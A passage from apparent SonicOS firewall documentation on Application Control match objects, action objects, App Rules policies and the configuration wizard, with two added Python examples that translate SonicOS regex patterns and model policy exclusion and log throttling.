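    "g": (r"\x21-\x7e", False), "G": (r"\x21-\x7e", True),          # [:graph:]
    "h": ("0-9A-Fa-f", False), "H": ("0-9A-Fa-f", True),            # [:xdigit:]
    "l": ("a-z", False), "L": ("a-z", True),                        # [:lower:]
    "u": ("A-Z", False), "U": ("A-Z", True),                        # [:upper:]
    "p": (r"\x00-\x7f", False), "P": (r"\x80-\xff", False),         # [:ascii:] pos/neg
}

# SonicOS modifiers -> Python flags (/i case-insensitive, /s '.' matches '\n').
_MODIFIERS = {"i": re.IGNORECASE, "s": re.DOTALL}


def strip_comment(pattern: str) -> str:
    """Discard a SonicOS comment: one or more spaces, '#', and everything after."""
    return re.sub(r" +#.*$", "", pattern)


def translate(pattern: str) -> str:
    """Rewrite SonicOS shorthand classes into explicit Python character classes."""
    out = []
    in_class = False
    i = 0
    while i < len(pattern):
        ch = pattern[i]
        if ch == "\\" and i + 1 < len(pattern):
            nxt = pattern[i + 1]
            if nxt in _CLASSES:
                chars, negated = _CLASSES[nxt]
                if not in_class:
                    out.append(f"[^{chars}]" if negated else f"[{chars}]")
                elif negated:
                    # e.g. [\L]: a negated class nested inside a class has no plain re form
                    raise ValueError(f"\\{nxt} inside [...] is not supported by this translator")
                else:
                    out.append(chars)  # splice the range into the enclosing class
            else:
                out.append(ch + nxt)   # any other escape (\d, \x7f, \\ ...) passes through
            i += 2
            continue
        if ch == "[" and not in_class:
            in_class = True
        elif ch == "]" and in_class:
            in_class = False
        out.append(ch)
        i += 1
    return "".join(out)


def compile_sonicos(pattern: str, modifiers: str = "") -> re.Pattern:
    """Compile a SonicOS match-object pattern; modifiers is e.g. "is" for /i and /s.

    The pattern is compiled as bytes so that \\P ([0x80-0xFF]) and \\d/\\w keep
    their ASCII meaning, the way the firewall sees raw payload bytes.
    """
    flags = 0
    for m in modifiers:
        flags |= _MODIFIERS[m]  # KeyError for anything other than i or s
    return re.compile(translate(strip_comment(pattern)).encode("latin-1"), flags)


def payload_matches(pattern: str, payload: bytes, modifiers: str = "") -> bool:
    """True if the SonicOS pattern matches anywhere in the payload."""
    return compile_sonicos(pattern, modifiers).search(payload) is not None


if __name__ == "__main__":
    # Constructed sample payloads, not captured traffic.
    samples = [b"GET /dl/deadBEEF1234cafe.bin HTTP/1.1", b"GET /index.html HTTP/1.1"]
    for p in samples:
        # 16 hex digits followed by '.bin', case-insensitive, with a SonicOS comment.
        print(p, payload_matches(r"\h{16}\.bin   # hex-named binary", p, "i"))
```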

Negative Matching

Negative matching provides an alternate way to specify which content to block. You can enable negative matching in a match object when you want to block everything except a particular type of content. When you use the object in a policy, the policy will execute actions based on absence of the content specified in the match object. Multiple list entries in a negative matching object are matched using the logical AND, meaning that the policy action is executed only when all specified negative matching entries are matched.

Although all App Rules policies are DENY policies, you can simulate an ALLOW policy by using negative matching. For instance, you can allow email .txt attachments and block attachments of all other file types. Or you can allow a few types, and block all others.

Not all match object types can utilize negative matching. For those that can, you will see the Enable Negative Matching check box on the Match Object Settings dialog.

Application List Objects

The Firewall > Match Objects page also contains the Add Application List Object button. Clicking it opens the Create Match Object dialog, which has two tabs:

Application – You can create an application filter object on this tab. This screen allows selection of the application category, threat level, type of technology, and attributes. After selections are made, the list of applications matching those criteria is displayed. The Application tab provides another way to create a match object of the Application List type. See Application Filters.
Category – You can create a category filter object on this tab. A list of application categories and their descriptions are provided. The Category page offers another way to create a match object of the Application Category List type. See Category Filters.
Application Filters

The Application tab provides a list of applications for selection. You can control which applications are displayed by selecting one or more application categories, threat levels, and technologies. You can also search for a keyword in all application names by typing it into the Search field near the top right of the display. For example, type “bittorrent” into the Search field and click the Search icon to find the applications with “bittorrent” (not case-sensitive) in their names.

When the application list is reduced to a list that is focused on your preferences, you can select the individual applications for your filter by clicking the Plus icon next to them, and then save your selections as an application filter object with a custom name or an automatically generated name. Filtered Application List shows the dialog with all categories, threat levels, and technologies selected, but before any individual applications have been chosen.

Filtered Application List

As you select the applications for your filter, they appear in the Application Group field on the right. You can edit the list in this field by deleting individual items or by clicking the eraser to delete all items. Grouped Applications shows several applications in the Application Group field. The selected applications are also marked with a green check mark icon in the application list on the left side.

Grouped Applications

When finished selecting the applications to include, you can type in a name for the object in the Match Object Name field (first, clear the Auto-generate match object name check box) and click the Save Application Match Object button. You will see the object name listed on the Firewall > Match Objects page with an object type of Application List. This object can then be selected when creating an App Rules policy.

Match Objects created using the Auto-generate match object name option display a tilde (~) as the first character of the object name.

Category Filters

The Category tab provides a list of application categories for selection. You can select any combination of categories and then save your selections as a category filter object with a custom name. Customized Category Filter shows the tab with the description of the IM category displayed.

Customized Category Filter

You can hover your mouse pointer over each category in the list to see a description of it. To create a custom category filter object, simply type in a name for the object in the Match Object Name field (first, clear the Auto-generate match object name check box), select one or more categories, and click the Save Category Match Object button. You will see the object name listed on the Firewall > Match Objects page with an object type of Application Category List. This object can then be selected when creating an App Rules policy.

Match Objects created using the Auto-generate match object name option display a tilde (~) as the first character of the object name.

Action Objects

Action Objects define how the App Rules policy reacts to matching events. You can choose a customizable action or select one of the predefined, default actions.

The predefined actions are displayed in the App Control Policy Settings dialog when you add or edit a policy from the App Rules page.

A number of BWM action options are also available in the predefined, default action list. The BWM action options change depending on the Bandwidth Management Type setting on the Firewall Settings > BWM page. If the Bandwidth Management Type is set to Global, all eight priorities are selectable. If the Bandwidth Management Type is set to Advanced, no priorities are selectable, but the predefined priorities are available when adding a policy.

Default Actions for Adding a Policy shows predefined default actions that are available when adding a policy. Action Object Settings: Action Types shows both predefined and custom actions.

 

Default Actions for Adding a Policy

Always Available | If BWM Type = Global | If BWM Type = Advanced
Reset / Drop | BWM Global-Realtime | Advanced BWM Low
No Action | BWM Global-Highest | Advanced BWM Medium
Bypass DPI | BWM Global-High | Advanced BWM High
Packet Monitor | BWM Global-Medium High |
 | BWM Global-Medium |
 | BWM Global-Medium Low |
 | BWM Global-Low |
 | BWM Global-Lowest |

For more information about BWM actions, see Actions Using Bandwidth Management.

The following customizable actions are displayed in the Add/Edit Action Object dialog when you click Add New Action Object on the Firewall > Action Objects page:

Block SMTP Email - Send Error Reply
Disable Email Attachment - Add Text
Email - Add Text
FTP Notification Reply
HTTP Block Page
HTTP Redirect
Bandwidth Management

See Action Object Settings: Action Types for descriptions of these action types.

NOTE: Only the customizable actions are available for editing in the Action Object Settings dialog, shown in the image below. The predefined actions cannot be edited or deleted. When you create a policy, the Policy Settings dialog provides a way for you to select from the predefined actions along with any customized actions that you have defined.
 

Action Object Settings: Action Types

Action Type | Description | Predefined or Custom
BWM Global-Realtime | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of zero. | Predefined
BWM Global-Highest | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 1. | Predefined
BWM Global-High | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts (default is 30%) and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 2. | Predefined
BWM Global-Medium High | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 3. | Predefined
BWM Global-Medium | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts (default is 50%) and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 4. | Predefined
BWM Global-Medium Low | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 5. | Predefined
BWM Global-Low | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts (default is 20%) and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 6. | Predefined
BWM Global-Lowest | Manages inbound and outbound bandwidth; can be configured for guaranteed bandwidth in varying amounts and maximum/burst bandwidth usage up to 100% of total available bandwidth; sets a priority of 7. | Predefined
Bypass DPI | Bypasses the Deep Packet Inspection components IPS, GAV, Anti-Spyware and Application Control. Once triggered, this action persists for the duration of the entire connection. Special handling is applied to FTP control channels, which are never bypassed for Application Control inspection; this action supports proper handling of the FTP data channel. NOTE: Bypass DPI does not stop filters that are enabled on the Firewall Settings > SSL Control page. | Predefined
No Action | Policies can be specified without any action. This allows “log only” policy types. | Predefined
Packet Monitor | Uses the SonicOS Packet Monitor capability to capture the inbound and outbound packets in the session or, if mirroring is configured, to copy the packets to another interface. The capture can be viewed and analyzed with Wireshark. | Predefined
Reset / Drop | For TCP, the connection is reset. For UDP, the packet is dropped. | Predefined
Advanced BWM High | Manages ingress and egress bandwidth; can be configured for guaranteed and maximum bandwidth in varying amounts of the total available bandwidth. | Predefined
Advanced BWM Medium | Manages ingress and egress bandwidth; can be configured for guaranteed and maximum bandwidth in varying amounts of the total available bandwidth. | Predefined
Advanced BWM Low | Manages ingress and egress bandwidth; can be configured for guaranteed and maximum bandwidth in varying amounts of the total available bandwidth. | Predefined
Block SMTP Email - Send Error Reply | Blocks SMTP email and notifies the sender with a customized error message. | Custom
Disable Email Attachment - Add Text | Disables the attachment inside an email and adds customized text. | Custom
Email - Add Text | Appends custom text at the end of the email. | Custom
FTP Notification Reply | Sends text back to the client over the FTP control channel without terminating the connection. | Custom
HTTP Block Page | Allows a custom HTTP block page configuration with a choice of colors. | Custom
HTTP Redirect | Provides HTTP redirect functionality. For example, to redirect users to the Google Web site, the customizable part would be: http://www.google.com. If an HTTP Redirect is sent from Application Control to a browser that has a form open, the information in the form will be lost. | Custom
Bandwidth Management | Allows definition of bandwidth management constraints with the same semantics as Access Rule BWM policy definition. | Custom

Email Address Objects

Application Control allows the creation of custom email address lists as email address objects. You can only use email address objects in an SMTP client policy configuration. Email address objects can represent either individual users or the entire domain. You can also create an email address object that represents a group by adding a list of individual addresses to the object. This provides a way to easily include or exclude a group of users when creating an SMTP client policy.

For example, you can create an email address object to represent the support group:

After you define the group in an email address object, you can create an SMTP client policy that includes or excludes the group.

In the screenshot below, the settings exclude the support group from a policy that prevents executable files from being attached to outgoing email. You can use the email address object in either the MAIL FROM or RCPT TO fields of the SMTP client policy. The MAIL FROM field refers to the sender of the email. The RCPT TO field refers to the intended recipient.

Although Application Control cannot extract group members directly from Outlook Exchange or similar applications, you can use the member lists in Outlook to create a text file that lists the group members. Then, when you create an email address object for this group, you can use the Load From File button to import the list from your text file. Be sure that each email address is on a line by itself in the text file.

Licensing Application Control

Application Intelligence and Control has two components:

The Intelligence component is licensed as App Visualization and provides identification and reporting of application traffic on the Dashboard > Real-Time Monitor and Dashboard > App Flow Monitor pages in SonicOS 5.9.
The Control component is licensed as App Control and allows you to create and enforce custom App Control and App Rules policies for logging, blocking, and bandwidth management of application traffic handled by your network.

App Visualization and App Control are licensed together in a bundle with other security services including SonicWALL Gateway Anti-Virus (GAV), Anti-Spyware, and Intrusion Prevention Service (IPS).

NOTE: Upon registration on MySonicWall, or when you load SonicOS 5.9 onto a registered SonicWALL device, supported SonicWALL appliances begin an automatic 30-day trial license for App Visualization and App Control, and application signatures are downloaded to the appliance.

A free 30-day trial is also available for the other security services in the bundle, but it is not automatically enabled as it is for App Visualization and App Control. You can start the additional free trials on the individual Security Services pages in SonicOS, or on MySonicWall.

Once the App Visualization feature is manually enabled on the Log > Flow Reporting page (see below), you can view real-time application traffic on the Dashboard > Real-Time Monitor page and application activity in other Dashboard pages for the identified/classified flows from the SonicWALL application signature database.

To begin using App Control, you must enable it on the Firewall > App Control Advanced page:

To create policies using App Rules (included with the App Control license), select Enable App Rules on the Firewall > App Rules page:

The SonicWALL Licensing server provides the App Visualization and App Control license keys to the SonicWALL device when you begin a 30-day trial (upon registration) or purchase a Security Services license bundle.

Licensing is available on https://www.MySonicWall.com/ on the Service Management - Associated Products page under GATEWAY SERVICES.

The Security Services license bundle includes licenses for these subscription services:

App Visualization
App Control
Gateway Anti-Virus
Gateway Anti-Spyware
Intrusion Prevention Service

Application signature updates and signature updates for other Security Services are periodically downloaded to the SonicWALL appliance as long as these services are licensed.

NOTE: If you disable Visualization in the SonicOS management interface, application signature updates are discontinued until the feature is enabled again.

When High Availability is configured between two SonicWALL appliances, the appliances can share the Security Services license. To use this feature, you must register the SonicWALL appliances on MySonicWall as Associated Products. Both appliances must be the same SonicWALL model.

NOTE: For a High Availability pair, even if you first register your appliances on MySonicWall, you must individually register both the Primary and the Backup appliances from the SonicOS management interface while logged into the individual management IP address of each appliance. This allows the Backup unit to synchronize with the SonicWALL license server and share licenses with the associated Primary appliance. When Internet access is restricted, you can manually apply the shared licenses to both appliances.

NOTE: App Visualization and App Control are not supported on the SonicWALL TZ 200 or 100 series appliances. These features are supported on SonicWALL TZ 210 series appliances, and on SonicWALL NSA appliances except the NSA 2400MX.

Glossary

Application layer: The seventh level of the 7-layer OSI model; examples of application layer protocols are AIM, DNS, FTP, HTTP, IMAP, MSN Messenger, POP3, SMTP, SNMP, TELNET, and Yahoo Messenger

Bandwidth management: The process of measuring and controlling the traffic on a network link to avoid network congestion and poor performance of the network

Client: Typically, the client (in a client-server architecture) is an application that runs on a personal computer or workstation, and relies on a server to perform some operations

Digital rights management: Technology used by publishers or copyright owners to control access to and usage of digital data

FTP: File Transfer Protocol, a protocol for exchanging files over the Internet

Gateway: A computer that serves as an entry point for a network; often acts as a firewall or a proxy server

Granular control: The ability to control separate components of a system

Hexadecimal: Refers to the base-16 number system

HTTP: Hyper Text Transfer Protocol, the underlying protocol used by the World Wide Web

HTTP redirection: Also known as URL redirection, a technique on the Web for making a Web page available under many URLs

IPS: Intrusion Prevention Service

MIME: Multipurpose Internet Mail Extensions, a specification for formatting non-ASCII messages such as graphics, audio, or video, so that they can be sent over the Internet

POP3: Post Office Protocol, a protocol used to retrieve email from a mail server; can be used with or without SMTP

Proxy: A computer that operates a network service that allows clients to make indirect network connections to other network services

SMTP: Simple Mail Transfer Protocol, a protocol used for sending email messages between servers

UDP: User Datagram Protocol, a connectionless protocol that runs on top of IP networks

Firewall > App Rules

You must enable Application Control before you can use it. App Control and App Rules are both enabled with global settings, and App Control must also be enabled on each network zone that you want to control.

You can configure App Control policies from the Dashboard > App Flow Monitor page by selecting one or more applications or categories and then clicking the Create Rule button. A policy is automatically created on the Firewall > App Rules page, and can be edited just like any other policy.

You can configure Application Control global blocking or logging policies for application categories, signatures, or specific applications on the Firewall > App Control Advanced page. Corresponding match objects are created. You can also configure match objects for these application categories, signatures, or specific applications on the Firewall > Match Objects page. The objects can be used in an App Rules policy, no matter how they were created.

You can configure policies in App Rules using the wizard or manually on the Firewall > App Rules page. The wizard provides a safe method of configuration and helps prevent errors that could result in unnecessary blocking of network traffic. Manual configuration offers more flexibility for situations that require custom actions or policies.

The Firewall > App Rules page contains two global settings:

Enable App Rules
Global Log Redundancy Filter

Enabling App Rules

You must enable App Rules to activate the functionality. App Rules is licensed as part of App Control, which is licensed on https://www.MySonicWall.com/ on the Service Management - Associated Products page under GATEWAY SERVICES. You can view the status of your license at the top of the Firewall > App Rules page:

To enable App Rules and configure the global settings:

1. To enable App Rules, select the Enable App Rules checkbox.
2. To log all policy matches, leave the Global Log Redundancy Filter field set to 0. To enforce a delay between log entries for matches to the same policy, enter the number of seconds to delay.

Global log redundancy settings apply to all App Rules policies. If set to zero, a log entry is created for each policy match found in passing traffic. Other values specify the minimum number of seconds between log entries for multiple matches to the same policy. For example, a log redundancy setting of 10 will log no more than one message every 10 seconds for each policy match. Log redundancy can also be set per policy in the Add/Edit Policy dialog; a policy's own log redundancy filter setting overrides the global setting for that policy.

Prerequisites to Configuring App Rules Policies

When you have created a match object, and optionally, an action or an email address object, you are ready to create a policy that uses them. For information about these prerequisites to configuring App Rules, see the following sections:

For information about using the App Control Wizard to create a policy, see Using the Application Control Wizard.

For information about policies and policy types, see App Rules Policy Creation.

Configuring App Rules Policies

To prepare for creating an App Rules policy, see Prerequisites to Configuring App Rules Policies.

To configure an App Rules policy:

1. Navigate to Firewall > App Rules.
2. Below the App Rules Policies table, click Add New Policy. The App Control Policies Settings dialog displays.
3. Enter a descriptive name into the Policy Name field.
4. Select a Policy Type from the drop-down menu. Your selection here affects the options available in the dialog. For information about available policy types, see App Rules Policy Creation.
5. Select a source and destination Address Group or Address Object from the Address drop-down menus. Only a single Address field is available for IPS Content, App Control Content, or CFS policy types.
6. Select the source or destination service from the Service drop-down menus. Some policy types do not provide a choice of service.
7. For Exclusion Address, optionally select an Address Group or Address Object from the drop-down menu. This address will not be affected by the policy.
8. For Match Object, select a match object from the drop-down menu. The list contains the defined match objects that are applicable to the policy type. When the policy type is HTTP Client, you can optionally select an Excluded Match Object.

   The excluded match object provides the ability to differentiate subdomains in the policy. For example, if you wanted to allow news.yahoo.com but block all other yahoo.com sites, you would create match objects for both yahoo.com and news.yahoo.com. You would then create a policy with Match Object yahoo.com and Excluded Match Object news.yahoo.com.

   NOTE: The Exclusion Match Object does not take effect when the match object type is set to Custom Object, and Custom Objects cannot be selected as the Exclusion Match Object.

9. For Action, select an action from the drop-down menu. The list contains actions that are applicable to the policy type, and can include the predefined actions, plus any customized actions. For a log-only policy, select No Action.
10. For Users/Groups, select from the drop-down menus for both Included and Excluded. The selected users or group under Excluded will not be affected by the policy.
11. If the policy type is SMTP Client, select from the drop-down menu for MAIL FROM and RCPT TO, for both Included and Excluded. The selected users or group under Excluded will not be affected by the policy.
12. For Schedule, select from the drop-down menu. The menu provides a variety of schedules for the policy to be in effect.
13. If you want the policy to create a log entry when a match is found, select the Enable Logging check box.
14. To record more details in the log, select the Log individual object content check box.
15. If the policy type is IPS Content, select the Log using IPS message format check box to display the category in the log entry as “Intrusion Prevention” rather than “Application Control”, and to use a prefix such as “IPS Detection Alert” in the log message rather than “Application Control Alert.” This is useful if you want to use log filters to search for IPS alerts.
16. If the policy type is App Control Content, select the Log using App Control message format check box to display the category in the log entry as “Application Control”, and to use a prefix such as “Application Control Detection Alert” in the log message. This is useful if you want to use log filters to search for Application Control alerts.
17. If the policy type is CFS, select the Log using CFS message format check box to display the category in the log entry as “Network Access”, and to use a log message such as “Web site access denied” rather than no prefix. This is useful if you want to use log filters to search for content filtering alerts.
18. For Log Redundancy Filter, either select Global Settings to use the global value set on the Firewall > App Rules page, or enter a number of seconds to delay between each log entry for this policy. The local setting overrides the global setting only for this policy; other policies are not affected.
19. For Connection Side, select from the drop-down list. The available choices depend on the policy type and can include Client Side, Server Side, or Both, referring to the side where the traffic originates. IPS Content, App Control Content, or CFS policy types do not provide this configuration option.
20. For Direction, click either Basic or Advanced and select a direction from the drop-down menu:
   Basic allows you to select incoming, outgoing, or both.
   Advanced allows you to select between zones, such as LAN to WAN.
21. If the policy type is IPS Content, App Control Content, or CFS, select a zone from the Zone drop-down menu. The policy is applied to this zone.
22. If the policy type is CFS, select an entry from the CFS Allow List drop-down menu. The menu contains any defined CFS Allow/Forbidden List type of match objects, and also provides None as a selection. The domains in the selected entry will not be affected by the policy.
23. If the policy type is CFS, select an entry from the CFS Forbidden List drop-down menu. The menu contains any defined CFS Allow/Forbidden List type of match objects, and also provides None as a selection. The domains in the selected entry will be denied access to matching content, instead of having the defined action applied.
24. If the policy type is CFS, select the Enable Safe Search Enforcement check box to prevent safe search enforcement from being disabled on search engines such as Google, Yahoo, Bing, and others.

   NOTE: Google Safe Search helps prevent adult content or other potentially offensive content from appearing in search results.

25. If the policy type is CFS, select Enable YouTube for Schools and enter your School ID to enable the YouTube for Schools feature. For more information, see YouTube for Schools and SonicWall Content Filtering Service.
26. Click OK.
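As an added example (not SonicOS code), the following Python model reproduces two behaviours from this procedure: how a Match Object combined with an Excluded Match Object carves a subdomain out of a policy (step 8), and how the Log Redundancy Filter throttles log entries, with a per-policy value overriding the global one (step 18 and the Enabling App Rules section). The class and field names, the host-suffix matching rule, and the timestamps are assumptions made for the example.

```python
"""Model of how an App Rules policy matches a host and throttles its log entries.

Added example, not SonicOS code. It models two behaviours described on this
page: the Match Object / Excluded Match Object pair (match yahoo.com but leave
news.yahoo.com alone) and the Log Redundancy Filter (0 logs every match, N
allows at most one entry per N seconds per policy, and a per-policy value
overrides the global one). Class names, field names and the host-suffix
matching rule are assumptions made for the example.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Optional


@dataclass
class MatchObject:
    """Host-name match object: an entry matches the host itself or any subdomain of it."""
    name: str
    entries: list[str]

    def matches(self, host: str) -> bool:
        host = host.lower()
        return any(host == e or host.endswith("." + e)
                   for e in (x.lower() for x in self.entries))


@dataclass
class Policy:
    name: str
    match: MatchObject
    excluded_match: Optional[MatchObject] = None
    action: str = "Reset / Drop"
    log_redundancy: Optional[int] = None   # None = Global Settings; 0 = log every match
    last_logged: Optional[float] = None    # time of the last log entry for this policy


@dataclass
class Verdict:
    policy: str
    action: str
    logged: bool


@dataclass
class AppRules:
    global_log_redundancy: int = 0         # seconds; 0 logs every match
    policies: list[Policy] = field(default_factory=list)

    def evaluate(self, host: str, now: float) -> list[Verdict]:
        """Return a verdict for every policy the host triggers at time `now`."""
        verdicts = []
        for p in self.policies:
            if not p.match.matches(host):
                continue
            if p.excluded_match is not None and p.excluded_match.matches(host):
                continue   # the excluded match object carves the subdomain out of the policy
            verdicts.append(Verdict(p.name, p.action, self._should_log(p, now)))
        return verdicts

    def _should_log(self, p: Policy, now: float) -> bool:
        """Apply the log redundancy filter: the policy's own value wins over the global one."""
        window = self.global_log_redundancy if p.log_redundancy is None else p.log_redundancy
        if window == 0 or p.last_logged is None or now - p.last_logged >= window:
            p.last_logged = now
            return True
        return False


def count_logged(rules: AppRules, host: str, times: list[float]) -> int:
    """Replay matches of `host` at the given times and count the log entries produced."""
    return sum(v.logged for t in times for v in rules.evaluate(host, t))


if __name__ == "__main__":
    rules = AppRules(global_log_redundancy=10)
    rules.policies.append(Policy(
        name="Block Yahoo except news",
        match=MatchObject("yahoo.com", ["yahoo.com"]),
        excluded_match=MatchObject("news.yahoo.com", ["news.yahoo.com"]),
    ))
    print(rules.evaluate("news.yahoo.com", 0.0))   # excluded: []
    print(rules.evaluate("mail.yahoo.com", 0.0))   # Reset / Drop, logged=True
    # Constructed burst: a match every second for 30 s yields one entry per 10 s window
    print(count_logged(rules, "mail.yahoo.com", [float(t) for t in range(1, 31)]))  # -> 3
```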

Using the Application Control Wizard

The Application Control wizard provides safe configuration of App Control policies for many common use cases, but not for everything. If at any time during the wizard you are unable to find the options that you need, you can click Cancel and proceed using manual configuration. When configuring manually, you must remember to configure all components, including match objects, actions, email address objects if required, and finally, a policy that references them. For the manual policy creation procedure, see Prerequisites to Configuring App Rules Policies.

To use the wizard to configure Application Control:
1
Login to the SonicWALL security appliance.
2
In the SonicWALL banner at the top of the page, click the Wizards icon. The wizards Welcome page displays.
3
Select the Application Control Wizard radio button and then click Next.
4
In the Application Control Wizard Introduction page, click Next.
5
In the Application Control Policy Type page , click a selection for the policy type, and then click Next.

You can choose among SMTP, incoming POP3, Web Access, or FTP file transfer. The policy that you create applies only to the type of traffic that you select. The next page varies, depending on your choice here.

6
In the Select <your choice> Rules for Application Control page, select a policy rule from the choices supplied, and then click Next.

Depending on your choice in the previous step, this page is one of four possible:

Select SMTP Rules for Application Control
Select POP3 Rules for Application Control
Select Web Access Rules for Application Control
Select FTP Rules for Application Control
7
The page displayed varies, depending on your choice of policy rule in the previous step. For the following policy rules, the wizard displays the Set Application Control Object Keywords and Policy Direction page on which you can select the traffic direction to scan, and the content or keywords to match, and then click Next.
All SMTP policy rule types except Specify maximum email size
All POP3 policy rule types
All Web Access policy rule types except Look for usage of certain web browsers and Look for usage of any web browser, except the ones specified
All FTP policy types except Make all FTP access read-only and Disallow usage of SITE command
8
In the Set Application Control Object Keywords and Policy Direction dialog, perform the following steps:
a
In the Direction drop-down menu, select the traffic direction to scan: Incoming, Outgoing, or Both.
b
Do one of the following:
* 
NOTE: If you selected a choice with the words except the ones specified in the previous step, content that you enter here will be the only content that does not cause the action to occur. See Negative Matching.
In the Content field, enter or paste a text or hexadecimal representation of the content to match, and then click Add. Repeat until all content is added to the List text box.
To import keywords from a predefined text file that contains a list of content values, one per line, click Load From File.
c
Click Next.
9
If you selected a policy type in the previous step that did not result in the Set Application Control Object Keywords and Policy Direction page with the standard options, the wizard displays a page that allows you to select the traffic direction, and certain other choices, depending on the policy type.
a
In the Direction drop-down menu, select the traffic direction to scan.
b
SMTP: In the Set Maximum Email Size page, in the Maximum Email Size field, enter the maximum number of bytes for an email message.
c
Web Access: In the Application Control Object Settings page, the Content field has a drop-down list with a limited number of choices, and no Load From File button is available. Select a browser from the drop-down menu.
d
FTP: In the special-case Set Application Control Object Keywords and Policy Direction page, you can only select the traffic direction to scan.
e
Click Next.
10
In the Application Control Action Settings page, select the action to take when matching content is found in the specified type of network traffic, and then click Next.

You will see one or more of the following choices, depending on the policy type:

Policy Type – Available Action
All Types – Log Only
All Types – Bypass DPI
SMTP – Blocking Action - block and send custom email reply
SMTP – Blocking Action - block without sending email reply
SMTP – Add Email Banner (append text at the end of email)
POP3 – Blocking Action - disable attachment and add custom text
Web Access – Blocking Action - custom block page
Web Access – Blocking Action - redirect to new location
Web Access – Blocking Action - Reset Connection
Web Access – Manage Bandwidth

11
In the second Application Control Action Settings page (if it is displayed), in the Content field, enter the text or URL that you want to use, and then click Next.

The second Application Control Action Settings page is only displayed when you selected an action in the previous step that requires additional text. For a Web Access policy type, if you selected an action that redirects the user, you can enter the new URL into the Content field.

12
In the Select Name for Application Control Policy page, in the Policy Name field, enter a descriptive name for the policy, and then click Next.
13
In the Confirm Policy Settings page, review the displayed values for the new policy and do one of the following:
To create a policy using the displayed configuration values, click Apply.
To change one or more of the values, click Back.
To exit the wizard without creating the policy, click Cancel.
14
In the Application Control Policy Complete page, to exit the wizard, click Close.
NOTE: You can configure Application Control policies without using the wizard. When configuring manually, you must remember to configure all components, including match objects; action objects, bandwidth, and email address objects if required; and finally, a policy that references them.

Firewall > App Control Advanced

The Firewall > App Control Advanced page:

Displays the status of the App Control database.
Provides a way to configure global App Control policies using categories, applications, and signatures.

Policies configured on this page are independent from App Rules policies, and do not need to be added to an App Rules policy to take effect.

You can configure the following settings on this page:

Select a category, an application, or a signature.
Select blocking, logging, or both as the action.
Specify users, groups, or IP address ranges to include in or exclude from the action.
Set a schedule for enforcing the controls.

While these application control settings are independent from App Rules policies, you can also create application match objects for any of the categories, applications, or signatures available here, and use those match objects in an App Rules policy. See Application List Objects for more information.

NOTE: Informational videos with App Control Advanced configuration examples are available online. For example, see How to Block Dropbox using App Control Advanced.

Additional videos are available at: https://support.software..com/videos-product-select.


Displaying App Control Status

The App Control Status section displays information about the signature database, allows you to update the database, and provides a link for enabling App Control.

App Signature Database – Indicates whether the App Signature database has been downloaded.
App Signature Database Timestamp – Displays the UTC day and time the App Signature database was downloaded. To update the App Signature database, click the Update button.
Last checked – Displays the day and time SonicOS last checked for updates to the App Signature database.
App Signature DB Expiration Date – Displays the day that the App Signature database expires.

To enable App Control on a per-zone basis, click the here link in the Note. The link displays the Network > Zones page.

Configuring App Control Global Settings

The App Control Global Settings section provides these global settings:

Enable App Control
Enable Logging For All Apps
Configure App Control Settings
Reset App Control Settings & Policies

App Control is a licensed service, and you must also enable it to activate the functionality.

To enable App Control and configure the global settings:
1
To globally enable App Control, select the Enable App Control check box. This option is not selected by default.
2
Optionally, to enable logging for all apps, select the Enable Logging for All Apps check box. This option is not selected by default.
3
To activate App Control and, if enabled, logging, click Accept.
4
To enable App Control on a network zone, navigate to the Network > Zones page.
5
Click the Configure icon for the desired zone. The Edit Zone dialog displays.

6
Select the Enable App Control Service check box, then click OK.
NOTE: App Control policies are applied to traffic within a network zone only if you enable the App Control Service for that zone. App Rules policies are independent, and not affected by the App Control setting for network zones.

The Network > Zones page displays a green indicator in the App Control column for any zones that have the App Control service enabled.

7
To configure a global exclusion list for App Control policies, go to the Firewall > App Control Advanced page.
8
In the App Control Global Settings section, click the Configure App Control Settings button. The App Control Exclusion List dialog opens.

9
To enable the App Control exclusion list, select the Enable Application Control Exclusion List check box. This option is not selected by default.
10
To use:
The IPS exclusion list, which can be configured from the Security Services > Intrusion Prevention page, select the Use IPS Exclusion List radio button. This option is selected by default when you enable the exclusion list.
An address object for the exclusion list, select the Use Application Control Exclusion Address Object radio button, and then select an address object from the drop-down menu.
11
Click OK.
To reset App Control settings and policy configuration to the factory default values:
1
Click the Reset App Control Settings & Policies button on the Firewall > App Control Advanced page.
2
Click OK in the confirmation dialog.

Viewing Signatures

You can change the App Control Advanced display through the various View Styles:

Category
All (default) – Displays all categories and their signature applications
Individual category – Displays all signature applications for the specified category
Application
All (default) – Displays all signature applications associated with the specified category or categories
Viewed by
Signature – Displays all signature applications associated with the specified category and the signatures associated with the application
Application (default) – Displays all signature applications associated with the specified category or categories
Category – Displays all categories or the category specified in the Category View Style

You can also display the Edit App Control Signature dialog for a particular signature by entering its ID in the Lookup Signature ID field.


Viewing by All Categories and All Applications by Applications

The App Control Advanced table displays the following columns; for a description of what each column displays, see Viewing by All Categories and All Applications by Signatures.

Category, Application, Block, Log, Comments, Configure

Viewing by All Categories and All Applications by Signatures

Category – Name of the selected signature category or of all signature categories. All signature applications are grouped under the same category heading, such as APP-UPDATE.
Application – Name of each signature application within a category.
Name – Signature name.
ID – Signature ID.
Block – Indicates whether the category or application is blocked. If blocking is enabled, an Enabled icon appears in this column. The word Default may appear for a category.
Log – Indicates whether the category or application is logged. If logging is enabled, an Enabled icon appears in this column.
Direction – Traffic direction:
Incoming
Incoming, to Client
Incoming, to Server
Incoming, to Client, to Server
Outgoing
Outgoing, to Client
Outgoing, to Server
Outgoing, to Client, to Server
Both
Both, to Client
Both, to Server
Both, to Client, to Server
